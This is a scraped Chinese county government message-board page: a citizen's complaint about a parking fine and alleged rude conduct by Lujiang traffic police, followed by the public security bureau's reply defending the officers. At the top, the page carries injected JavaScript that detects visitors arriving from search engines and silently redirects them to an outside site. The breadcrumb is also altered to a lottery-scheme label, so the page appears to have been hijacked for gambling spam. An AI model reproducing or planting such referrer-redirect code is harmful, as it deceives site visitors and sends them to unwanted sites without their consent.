var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }
收藏
您当前所在的位置:上海快三计划 >
政民互动 > 咨询投诉

来信信息
信件编号: 182422201041378
信件类型: 我要投诉
来信标题: 庐江铁骑交警执的是哪家法?
来信时间: 2020-01-04
来信内容:
在周瑜大道辅路停车十秒不到,被罚记3分罚200元。且处罚交警态度恶劣,到岗亭后一班交警更是像黑社会样指指点点恶语相对。请问:哪家法律有此规定(十秒不到罚200元记3分)?警察是保护人民,这群人这样态度,人民能安心?社会能稳定?当前扫黑能否也扫下?并后来竟恐吓要让派出所抓,他们打电话派出所说不抓才让我走。请问这和黑社会有何二样?是不是有过之而无不及?真令公民心寒。这背后主要是金钱诱惑及自以为是高高在上优越感所致。勿必请县长管下,以平民冤。执“法"警号丨j0193及农行大厦岗亭一批人。
回复内容
答复单位: 庐江县公安局
办理时间: 2020-01-09
回复内容:

尊敬的来信人:您好!

您来信反映的问题已收悉,根据您反映的情况,我们已进行调查,现就相关问题回复如下:经查,2020年01月04日16时46分左右,庐城铁骑交警在正常巡逻时发现在周瑜大道辅道(中医院斜对面)停放一辆轿车,严重影响非机动车道畅通,随即前往查处其违法行为。周瑜大道属于严管路段,路口两侧均设有机动车禁止停车禁令标志,因来信人驾驶的机动车违反了禁令标志,根据《中华人民共和国道路交通安全法》第九十条规定,处罚200元,记3分。
我单位经调取现场执法记录仪视频核查,当时驾驶人不配合交警执法,从交警手里抢夺驾驶证,执勤交警责令其将驾驶证交出配合执法,并没有发现有来信人所反映的态度恶劣、恶语相对等方面问题。我单位已保存好现场执法视频,若来信人对此有异议可以到庐城交警中队核查执法记录仪视频。

感谢您对我们工作的理解和支持。


留言评价
查询密码:
评价结果: